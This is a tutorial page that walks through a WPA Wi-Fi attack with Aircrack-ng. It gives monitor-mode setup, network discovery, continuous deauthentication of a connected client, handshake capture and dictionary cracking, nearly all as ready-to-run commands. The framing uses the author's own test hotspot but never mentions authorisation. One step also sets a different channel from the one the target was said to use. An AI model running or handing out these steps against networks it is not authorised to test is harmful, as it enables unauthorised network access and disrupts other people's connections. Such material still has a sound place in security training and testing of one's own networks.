Aircrack-ng
Capturing WPA handshakes and cracking network passwords.
Tutorial Video
Requirements
Wifi adapter that supports monitor mode.
Linux machine or virtual machine.
Aircrack-ng.
List of common passwords. https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt
Step 1: Installation
sudo apt update
sudo apt-get install -y aircrack-ng Step 2: Check available Wi-Fi cards. And disable any processes that may interfere with monitor mode.
ip a
The internal Wi-Fi card can interfere with the deauth process so we set it to down with this command.
sudo ifconfig wlan0 downThis command will check any processes that my interfere with our Wi-Fi adapter in monitor mode.
sudo airmon-ng checkThis command then kills any of the processes listed from the command above.
sudo airmon-ng check kill
Step 3: The next command will set the Wi-Fi adapter into monitor mode.
sudo airmon-ng start wlan1
Step 4: Next we want to grab the hex value of our target network.
sudo airodump-ng wlan1mon
Our hotspot named TestNetwork seems to be operating on channel 6 with the shown mac address.
Step 5: Now we only want to listen to devices trying to connect to our target network so we run the following command.
sudo airodump-ng -c1 -w capture -d (YOUR TARGET'S HEX VALUE) wlan1mon
Step 6: Now we can see the network and a device that is currently connected. We want to deauth this device from the network and capture the WPA handshake when it attempts to re-join the network.
sudo aireplay-ng --deauth 0 -a (NETWORK HASH) -c (DEVICE HASH) wlan1mon
Step 7: Once we have captured the wpa handshake we can turn off monitor mode on our adapter and attempt to crack the password using a list of popular used passwords.
sudo airmon-ng stop wlan1mon
sudo aircrack-ng (YOUR CAPTURE FILE) -w (YOUR PASSWORD LIST DIRECTORY) 
Step 8: Congrats!!! 🥳🥳🥳 you have just learned how to use Aircrack-ng to capture and crack a wpa handshake.
Last updated